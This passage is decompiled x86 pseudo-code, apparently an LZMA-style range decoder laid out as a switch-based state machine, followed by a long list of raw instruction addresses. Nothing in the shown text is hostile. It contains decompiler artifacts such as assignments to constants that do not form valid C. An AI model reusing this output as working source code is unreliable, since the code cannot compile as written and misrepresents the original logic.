                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												goto L69;
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t613 - 0x88) = _t533;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t613 - 0x88) = _t533;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L80;
                                                          											case 0x1b:
                                                          												L76:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t275 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t275;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t284 = __ebp - 0x64;
                                                          												 *_t284 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t284;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L80:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L81;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L81:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t535 = _t534 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x0040711c
                                                          0x0040711c
                                                          0x00407120
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407122
                                                          0x00407122
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
